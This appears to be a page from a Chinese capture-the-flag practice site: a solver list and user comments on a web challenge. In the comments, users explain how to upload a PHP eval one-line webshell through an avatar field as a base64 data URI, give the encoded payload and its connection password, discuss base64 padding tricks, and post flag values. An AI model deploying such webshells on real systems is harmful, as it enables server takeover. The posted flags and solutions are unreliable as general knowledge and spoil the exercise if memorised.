评分(11)
解题动态
igrazee 攻破了该题 1天前
hbynb 攻破了该题 1天前
鲲中霸王 攻破了该题 1天前
南交混的入朱靖宇 攻破了该题 2天前
yiwuxiaobawang 攻破了该题 3天前
ProzacLou 攻破了该题 3天前
out不慢 攻破了该题 3天前
180度以南 攻破了该题 4天前
zrc2682 攻破了该题 5天前
Fbug 攻破了该题 5天前
ixin 攻破了该题 7天前
minz 攻破了该题 10天前
caocao 攻破了该题 14天前
一世温华 攻破了该题 14天前
Robert 攻破了该题 14天前
2970507147 攻破了该题 15天前
几道达瓦 攻破了该题 16天前
zhenmingshui 攻破了该题 17天前
tytu 攻破了该题 17天前
评论
XRain 2年前
举报
实战题才好玩,各种黑盒测试,我看到 data://image/jpeg 和保存的图片文件名后缀 jpeg,就猜想这两个 jpeg 是不是有关联,一测发现果然有。
不会编程的崽 2年前
举报
我不理解,POST['a'],死活连不上,POST['attack']就可以。。。。。
lzq2000 5月前
举报
大家都知道base64编码是按顺序每三个字符一组进行编码,正常情况下对“;?>”进行base64编码得到的就是“Oz8+”,我们可以调整“;”前面的字符长度,让“;”不与“?>”分在一组编码即可!另外我估计把加号进行url编码应该也可以,我没测试。
lzq2000 5月前
举报
结尾不能为“+”,因为“+”会被认为是空格,不参与base64解码,所以解码后会少个大于号“>”,运行这个php时会报错!!!你这个马POST['a']在base64编码后会出现“+”,而POST['attack']不会出现加号!
三碗不过杠 2年前
举报
flag{fd71260e4d41df49807229647056e7dd} 头像处文件上传,抓包base64编码写入一句话木马,上传蚁剑链接,重点就是改php,base
冯飞99 2年前
举报
这种实战题才是最爽的 flag{50352c0c4604ee60638e2579cbe3e141}
孙谦的鸟岛 1月前
举报
你别骗我,我可是开国大元帅
wxy1343 2年前
举报
flag{412d5e0844a33f36c9aa3d688425fb9f}
ctfliu 2年前
举报
image=data%3Aimage%2Fphp%3Bbase64%2CPD9waHAgQGV2YWwoJF9QT1NUWydkYWRhZGYnXSk7Pz4= 密码dadadf 一剑连接返回的地址。在shell中用find / -name flag /var/www/html/flag
五无心惘然 2年前
举报
别用菜刀,连半天连不上,换蚁剑就可以,语句是<?php @eval($_POST['attack']);?>,没什么要注意的,bash64编码最后不是‘=’的换个链接密码就好了
OOwoofOO 2年前
举报
为什么我连上传木马都失败了啊?!我已经改了php并且用了base64编码,好无语。。。
Vio1et 2年前
举报
<?php eval($_POST['asdf']);?> 蹲一个大佬来解释一下为什么这个东西base64后上传用浏览器访问却不能执行。。
songyue 2年前
举报
上传头像就卡死,怎么玩